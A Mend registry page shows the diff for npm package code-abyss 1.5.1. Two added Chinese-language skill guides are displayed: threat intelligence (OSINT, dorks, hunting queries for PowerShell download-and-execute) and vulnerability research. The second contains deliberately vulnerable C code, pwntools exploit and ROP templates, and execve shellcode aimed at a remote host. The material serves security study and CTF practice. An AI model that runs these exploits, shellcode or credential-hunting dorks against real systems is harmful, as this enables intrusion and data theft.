npm - code-abyss - Versions diffs - 1.5.1 - Mend

code-abyss 1.5.1

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (64) hide show

package/LICENSE +21 -0
package/README.md +197 -0
package/bin/install.js +193 -0
package/bin/uninstall.js +42 -0
package/config/AGENTS.md +247 -0
package/config/CLAUDE.md +207 -0
package/config/settings.example.json +27 -0
package/output-styles/abyss-cultivator.md +399 -0
package/package.json +41 -0
package/skills/SKILL.md +115 -0
package/skills/ai/SKILL.md +29 -0
package/skills/ai/agent-dev.md +242 -0
package/skills/ai/llm-security.md +288 -0
package/skills/architecture/SKILL.md +41 -0
package/skills/architecture/api-design.md +225 -0
package/skills/architecture/caching.md +299 -0
package/skills/architecture/cloud-native.md +285 -0
package/skills/architecture/compliance.md +299 -0
package/skills/architecture/data-security.md +184 -0
package/skills/architecture/message-queue.md +329 -0
package/skills/architecture/security-arch.md +210 -0
package/skills/development/SKILL.md +43 -0
package/skills/development/cpp.md +246 -0
package/skills/development/go.md +323 -0
package/skills/development/java.md +277 -0
package/skills/development/python.md +288 -0
package/skills/development/rust.md +313 -0
package/skills/development/shell.md +313 -0
package/skills/development/typescript.md +277 -0
package/skills/devops/SKILL.md +36 -0
package/skills/devops/cost-optimization.md +272 -0
package/skills/devops/database.md +217 -0
package/skills/devops/devsecops.md +198 -0
package/skills/devops/git-workflow.md +181 -0
package/skills/devops/observability.md +280 -0
package/skills/devops/performance.md +273 -0
package/skills/devops/testing.md +186 -0
package/skills/gen-docs/SKILL.md +114 -0
package/skills/gen-docs/scripts/doc_generator.py +491 -0
package/skills/multi-agent/SKILL.md +268 -0
package/skills/run_skill.py +88 -0
package/skills/security/SKILL.md +51 -0
package/skills/security/blue-team.md +379 -0
package/skills/security/code-audit.md +265 -0
package/skills/security/pentest.md +226 -0
package/skills/security/red-team.md +321 -0
package/skills/security/threat-intel.md +322 -0
package/skills/security/vuln-research.md +369 -0
package/skills/tests/README.md +225 -0
package/skills/tests/SUMMARY.md +362 -0
package/skills/tests/__init__.py +3 -0
package/skills/tests/test_change_analyzer.py +558 -0
package/skills/tests/test_doc_generator.py +538 -0
package/skills/tests/test_module_scanner.py +376 -0
package/skills/tests/test_quality_checker.py +516 -0
package/skills/tests/test_security_scanner.py +426 -0
package/skills/verify-change/SKILL.md +138 -0
package/skills/verify-change/scripts/change_analyzer.py +529 -0
package/skills/verify-module/SKILL.md +125 -0
package/skills/verify-module/scripts/module_scanner.py +321 -0
package/skills/verify-quality/SKILL.md +158 -0
package/skills/verify-quality/scripts/quality_checker.py +481 -0
package/skills/verify-security/SKILL.md +141 -0
package/skills/verify-security/scripts/security_scanner.py +368 -0

package/skills/security/threat-intel.md ADDED Viewed

@@ -0,0 +1,322 @@
+---
+name: threat-intel
+description: 威胁情报。OSINT、威胁狩猎、情报分析、IOC管理。当用户提到威胁情报、OSINT、开源情报、威胁狩猎、IOC、TTP、ATT&CK时使用。
+---
+# 👁 天眼秘典 · 威胁情报 (Threat Intelligence)
+## 情报层次
+```
+┌─────────────────────────────────────────────────────────────┐
+│                    威胁情报金字塔                             │
+├─────────────────────────────────────────────────────────────┤
+│                      战略情报                                │
+│                   (决策层/长期趋势)                          │
+│                    ─────────────                             │
+│                     战术情报                                 │
+│                  (TTP/攻击手法)                              │
+│                   ─────────────                              │
+│                    运营情报                                  │
+│                 (攻击活动/APT)                               │
+│                  ─────────────                               │
+│                   技术情报                                   │
+│                (IOC/IP/域名/Hash)                            │
+└─────────────────────────────────────────────────────────────┘
+```
+## OSINT 信息收集
+### 域名/IP 情报
+```bash
+# DNS 查询
+dig +short example.com
+dig +short -x 1.2.3.4
+host example.com
+# WHOIS
+whois example.com
+whois 1.2.3.4
+# 子域名枚举
+subfinder -d example.com
+amass enum -d example.com
+```
+### 在线情报平台
+```yaml
+IP/域名信誉:
+  - VirusTotal: https://www.virustotal.com
+  - AbuseIPDB: https://www.abuseipdb.com
+  - Shodan: https://www.shodan.io
+  - Censys: https://search.censys.io
+  - GreyNoise: https://www.greynoise.io
+恶意软件分析:
+  - Any.Run: https://any.run
+  - Hybrid Analysis: https://www.hybrid-analysis.com
+  - Joe Sandbox: https://www.joesandbox.com
+  - MalwareBazaar: https://bazaar.abuse.ch
+威胁情报:
+  - AlienVault OTX: https://otx.alienvault.com
+  - MISP: https://www.misp-project.org
+  - ThreatFox: https://threatfox.abuse.ch
+```
+### 搜索引擎 Dorking
+```
+# Google Dorks
+site:example.com filetype:pdf
+site:example.com inurl:admin
+site:example.com intitle:"index of"
+"password" filetype:log site:example.com
+# Shodan
+hostname:example.com
+org:"Target Company"
+ssl.cert.subject.cn:example.com
+http.title:"Dashboard"
+# Censys
+services.http.response.html_title:"Admin"
+services.tls.certificates.leaf.subject.common_name:example.com
+```
+### 社交媒体情报
+```yaml
+平台:
+  - LinkedIn: 员工信息、组织架构
+  - GitHub: 代码泄露、API密钥
+  - Twitter: 安全事件、漏洞披露
+  - Pastebin: 数据泄露
+GitHub Dorks:
+  - "example.com" password
+  - "example.com" api_key
+  - "example.com" secret
+  - org:example filename:.env
+```
+## IOC 管理
+### IOC 类型
+```yaml
+网络层:
+  - IP 地址
+  - 域名
+  - URL
+  - User-Agent
+主机层:
+  - 文件 Hash (MD5/SHA1/SHA256)
+  - 文件路径
+  - 注册表键
+  - 进程名
+行为层:
+  - YARA 规则
+  - Sigma 规则
+  - Snort 规则
+```
+### IOC 格式 (STIX/TAXII)
+```json
+{
+  "type": "indicator",
+  "id": "indicator--xxx",
+  "created": "2024-01-01T00:00:00.000Z",
+  "pattern": "[file:hashes.SHA256 = 'abc123...']",
+  "pattern_type": "stix",
+  "valid_from": "2024-01-01T00:00:00.000Z",
+  "labels": ["malicious-activity"],
+  "kill_chain_phases": [{
+    "kill_chain_name": "mitre-attack",
+    "phase_name": "execution"
+  }]
+}
+```
+### IOC 自动化查询
+```python
+#!/usr/bin/env python3
+"""IOC 批量查询"""
+import requests
+class IOCChecker:
+    def __init__(self, vt_api_key):
+        self.vt_key = vt_api_key
+    def check_hash(self, file_hash):
+        """VirusTotal Hash 查询"""
+        url = f"https://www.virustotal.com/api/v3/files/{file_hash}"
+        headers = {"x-apikey": self.vt_key}
+        resp = requests.get(url, headers=headers)
+        if resp.status_code == 200:
+            data = resp.json()
+            stats = data['data']['attributes']['last_analysis_stats']
+            return {
+                'malicious': stats['malicious'],
+                'suspicious': stats['suspicious'],
+                'harmless': stats['harmless']
+            }
+        return None
+    def check_ip(self, ip):
+        """AbuseIPDB 查询"""
+        url = "https://api.abuseipdb.com/api/v2/check"
+        params = {"ipAddress": ip, "maxAgeInDays": 90}
+        # 需要 API Key
+        pass
+    def check_domain(self, domain):
+        """域名信誉查询"""
+        pass
+```
+## ATT&CK 映射
+### TTP 分析
+```yaml
+# 攻击者画像
+APT_Profile:
+  name: "APT-XX"
+  aliases: ["Group A", "Group B"]
+  targets:
+    - 金融行业
+    - 政府机构
+  techniques:
+    initial_access:
+      - T1566.001: Spearphishing Attachment
+      - T1566.002: Spearphishing Link
+    execution:
+      - T1059.001: PowerShell
+      - T1059.003: Windows Command Shell
+    persistence:
+      - T1547.001: Registry Run Keys
+      - T1053.005: Scheduled Task
+    c2:
+      - T1071.001: Web Protocols
+      - T1573.001: Encrypted Channel
+  tools:
+    - Cobalt Strike
+    - Mimikatz
+    - Custom Malware
+```
+### ATT&CK Navigator
+```python
+# 生成 ATT&CK Navigator 层
+def generate_navigator_layer(techniques):
+    layer = {
+        "name": "Threat Actor Coverage",
+        "versions": {"attack": "13", "navigator": "4.8"},
+        "domain": "enterprise-attack",
+        "techniques": []
+    }
+    for tech_id, score in techniques.items():
+        layer["techniques"].append({
+            "techniqueID": tech_id,
+            "score": score,
+            "color": "#ff6666" if score > 50 else "#ffcc66"
+        })
+    return layer
+```
+## 威胁狩猎
+### 狩猎流程
+```
+假设生成 → 数据收集 → 分析调查 → 发现验证 → 知识沉淀
+    │           │           │           │           │
+    └─ ATT&CK ──┴─ SIEM ────┴─ 查询 ────┴─ IOC ────┴─ 规则
+```
+### 狩猎假设模板
+```yaml
+hypothesis: "攻击者可能通过 PowerShell 下载执行恶意代码"
+technique: T1059.001
+data_sources:
+  - Windows PowerShell 日志 (4103, 4104)
+  - Sysmon 进程创建 (Event ID 1)
+query: |
+  EventID=4104 AND ScriptBlockText CONTAINS
+  ("IEX" OR "Invoke-Expression" OR "DownloadString" OR "Net.WebClient")
+expected_results:
+  - 可疑脚本块
+  - 外部 URL 下载
+  - 编码命令
+response:
+  - 隔离主机
+  - 提取样本
+  - 扩展狩猎
+```
+### 狩猎查询库
+```sql
+-- 异常 PowerShell 执行
+SELECT timestamp, hostname, user, command_line
+FROM process_events
+WHERE process_name = 'powershell.exe'
+  AND (command_line LIKE '%IEX%'
+       OR command_line LIKE '%DownloadString%'
+       OR command_line LIKE '%-enc%')
+-- 异常网络连接
+SELECT timestamp, process_name, remote_address, remote_port
+FROM network_events
+WHERE remote_port NOT IN (80, 443, 53, 22)
+  AND remote_address NOT LIKE '10.%'
+  AND remote_address NOT LIKE '192.168.%'
+-- 可疑文件创建
+SELECT timestamp, process_name, file_path
+FROM file_events
+WHERE file_path LIKE '%\Temp\%'
+  AND file_path LIKE '%.exe'
+  AND process_name IN ('powershell.exe', 'cmd.exe', 'wscript.exe')
+```
+## 情报共享
+### MISP 集成
+```python
+from pymisp import PyMISP
+misp = PyMISP(url, key, ssl=False)
+# 创建事件
+event = misp.new_event(
+    distribution=0,
+    info="Phishing Campaign 2024-01",
+    analysis=2,
+    threat_level_id=2
+)
+# 添加 IOC
+misp.add_attribute(event, type='ip-dst', value='1.2.3.4')
+misp.add_attribute(event, type='domain', value='malicious.com')
+misp.add_attribute(event, type='sha256', value='abc123...')
+# 添加标签
+misp.tag(event, 'tlp:amber')
+misp.tag(event, 'misp-galaxy:mitre-attack-pattern="T1566"')
+```
+## 工具清单
+| 工具 | 用途 |
+|------|------|
+| MISP | 威胁情报平台 |
+| OpenCTI | 威胁情报管理 |
+| TheHive | 事件响应平台 |
+| Maltego | 关系分析 |
+| Shodan | 网络空间搜索 |
+| VirusTotal | 恶意软件分析 |
+| ATT&CK Navigator | TTP 可视化 |
+---

package/skills/security/vuln-research.md ADDED Viewed

@@ -0,0 +1,369 @@
+---
+name: vuln-research
+description: 漏洞研究。二进制分析、逆向工程、Exploit开发、Fuzzing。当用户提到漏洞研究、二进制、逆向、Exploit、Fuzzing、PWN、栈溢出、堆溢出时使用。
+---
+# 🔥 赤焰秘典 · 漏洞研究 (Vulnerability Research)
+## 研究流程
+```
+目标分析 → 逆向工程 → 漏洞发现 → Exploit开发 → 报告/披露
+    │           │           │           │           │
+    └─ 架构 ────┴─ IDA ─────┴─ Fuzz ────┴─ PoC ────┴─ CVE
+```
+## 逆向工程
+### 静态分析
+```bash
+# 文件信息
+file binary
+strings binary | grep -i password
+readelf -h binary
+objdump -d binary
+# IDA Pro / Ghidra
+# 反汇编、反编译、交叉引用分析
+```
+### 动态分析
+```bash
+# GDB 调试
+gdb ./binary
+(gdb) break main
+(gdb) run
+(gdb) disas
+(gdb) x/20x $esp
+(gdb) info registers
+# strace/ltrace
+strace ./binary
+ltrace ./binary
+# GDB 增强
+# pwndbg / GEF / peda
+```
+### 常用工具
+```yaml
+反汇编/反编译:
+  - IDA Pro: 商业，最强大
+  - Ghidra: 开源，NSA出品
+  - Binary Ninja: 现代化
+  - Radare2: 开源命令行
+调试器:
+  - GDB + pwndbg/GEF
+  - x64dbg (Windows)
+  - WinDbg (Windows内核)
+  - LLDB (macOS)
+辅助工具:
+  - ROPgadget: ROP链构造
+  - one_gadget: libc gadget
+  - patchelf: ELF修改
+  - checksec: 安全机制检查
+```
+## 漏洞类型
+### 栈溢出
+```c
+// 漏洞代码
+void vulnerable(char *input) {
+    char buffer[64];
+    strcpy(buffer, input);  // 无边界检查
+}
+// 利用思路
+// 1. 覆盖返回地址
+// 2. 跳转到 shellcode 或 ROP 链
+```
+```python
+# Exploit 模板
+from pwn import *
+context.arch = 'amd64'
+p = process('./vuln')
+# 构造 payload
+padding = b'A' * 72  # 填充到返回地址
+ret_addr = p64(0x401234)  # 目标地址
+payload = padding + ret_addr
+p.sendline(payload)
+p.interactive()
+```
+### 堆溢出
+```c
+// 漏洞代码
+struct chunk {
+    char data[32];
+    void (*func_ptr)();
+};
+void vulnerable(char *input) {
+    struct chunk *c = malloc(sizeof(struct chunk));
+    strcpy(c->data, input);  // 溢出覆盖 func_ptr
+    c->func_ptr();
+}
+```
+### Use-After-Free
+```c
+// 漏洞代码
+void vulnerable() {
+    char *ptr = malloc(64);
+    free(ptr);
+    // ptr 未置空
+    strcpy(ptr, user_input);  // UAF
+}
+```
+### 格式化字符串
+```c
+// 漏洞代码
+void vulnerable(char *input) {
+    printf(input);  // 格式化字符串漏洞
+}
+// 利用
+// %x - 泄露栈数据
+// %n - 任意写
+// %s - 任意读
+```
+## 保护机制绕过
+### 检查保护
+```bash
+checksec ./binary
+# RELRO, Stack Canary, NX, PIE, FORTIFY
+```
+### 绕过技术
+```yaml
+NX (不可执行):
+  - ROP (Return Oriented Programming)
+  - ret2libc
+  - ret2syscall
+ASLR (地址随机化):
+  - 信息泄露
+  - 暴力破解 (32位)
+  - 部分覆盖
+Stack Canary:
+  - 信息泄露
+  - 逐字节爆破
+  - 覆盖 __stack_chk_fail
+PIE (位置无关):
+  - 信息泄露基址
+  - 部分覆盖
+RELRO:
+  - Partial: 覆盖 GOT
+  - Full: 其他利用方式
+```
+### ROP 链构造
+```python
+from pwn import *
+elf = ELF('./vuln')
+libc = ELF('./libc.so.6')
+rop = ROP(elf)
+# 泄露 libc 地址
+rop.puts(elf.got['puts'])
+rop.main()
+# 计算 libc 基址
+libc_base = leaked_puts - libc.symbols['puts']
+system = libc_base + libc.symbols['system']
+bin_sh = libc_base + next(libc.search(b'/bin/sh'))
+# 第二阶段 ROP
+rop2 = ROP(libc)
+rop2.system(bin_sh)
+```
+## Fuzzing
+### AFL++
+```bash
+# 编译插桩
+afl-gcc -o target_afl target.c
+# 准备种子
+mkdir input output
+echo "seed" > input/seed
+# 开始 Fuzz
+afl-fuzz -i input -o output -- ./target_afl @@
+# 分析崩溃
+afl-tmin -i output/crashes/id:000000 -o minimized -- ./target_afl @@
+```
+### LibFuzzer
+```cpp
+// fuzz_target.cpp
+extern "C" int LLVMFuzzerTestOneInput(const uint8_t *data, size_t size) {
+    // 调用被测函数
+    parse_input(data, size);
+    return 0;
+}
+```
+```bash
+# 编译
+clang++ -fsanitize=fuzzer,address fuzz_target.cpp -o fuzzer
+# 运行
+./fuzzer corpus/
+```
+### 智能 Fuzzing
+```python
+# 基于覆盖率的 Fuzzing
+# 使用 AFL、LibFuzzer 等
+# 基于语法的 Fuzzing
+# 使用 Peach、Domato 等
+# 符号执行辅助
+# 使用 KLEE、angr 等
+```
+## Exploit 开发
+### Shellcode
+```python
+# pwntools 生成
+from pwn import *
+context.arch = 'amd64'
+# execve("/bin/sh", NULL, NULL)
+shellcode = asm(shellcraft.sh())
+# 自定义 shellcode
+shellcode = asm('''
+    xor rdi, rdi
+    push rdi
+    mov rdi, 0x68732f6e69622f
+    push rdi
+    mov rdi, rsp
+    xor rsi, rsi
+    xor rdx, rdx
+    mov al, 59
+    syscall
+''')
+```
+### 完整 Exploit 模板
+```python
+#!/usr/bin/env python3
+from pwn import *
+context.arch = 'amd64'
+context.log_level = 'debug'
+# 配置
+binary = './vuln'
+libc_path = './libc.so.6'
+host, port = 'target.com', 1337
+# 加载
+elf = ELF(binary)
+libc = ELF(libc_path)
+def exploit(p):
+    # 1. 泄露地址
+    payload1 = b'A' * 72
+    payload1 += p64(elf.plt['puts'])
+    payload1 += p64(elf.got['puts'])
+    payload1 += p64(elf.symbols['main'])
+    p.sendline(payload1)
+    leaked = u64(p.recvline().strip().ljust(8, b'\x00'))
+    libc_base = leaked - libc.symbols['puts']
+    log.success(f"libc base: {hex(libc_base)}")
+    # 2. 获取 shell
+    system = libc_base + libc.symbols['system']
+    bin_sh = libc_base + next(libc.search(b'/bin/sh'))
+    payload2 = b'A' * 72
+    payload2 += p64(libc_base + 0x4f3d5)  # one_gadget
+    p.sendline(payload2)
+    p.interactive()
+if __name__ == '__main__':
+    if args.REMOTE:
+        p = remote(host, port)
+    else:
+        p = process(binary)
+    exploit(p)
+```
+## CTF PWN 技巧
+### 常见题型
+```yaml
+栈溢出:
+  - ret2text: 跳转到后门函数
+  - ret2shellcode: 跳转到 shellcode
+  - ret2libc: 调用 system("/bin/sh")
+  - ROP: 构造 ROP 链
+堆利用:
+  - fastbin attack
+  - unsorted bin attack
+  - tcache poisoning
+  - house of 系列
+格式化字符串:
+  - 泄露栈/libc地址
+  - 任意写 GOT
+  - 修改返回地址
+```
+### 快速解题流程
+```bash
+# 1. 检查保护
+checksec ./pwn
+# 2. 运行测试
+./pwn
+# 3. 反编译分析
+# IDA/Ghidra
+# 4. 确定漏洞点
+# 5. 编写 Exploit
+# 6. 本地测试
+# 7. 远程利用
+```
+## 工具清单
+| 工具 | 用途 |
+|------|------|
+| IDA Pro | 反汇编/反编译 |
+| Ghidra | 开源逆向 |
+| pwntools | Exploit 开发 |
+| GDB + pwndbg | 调试 |
+| AFL++ | Fuzzing |
+| ROPgadget | ROP 链 |
+| one_gadget | libc gadget |
+| angr | 符号执行 |
+---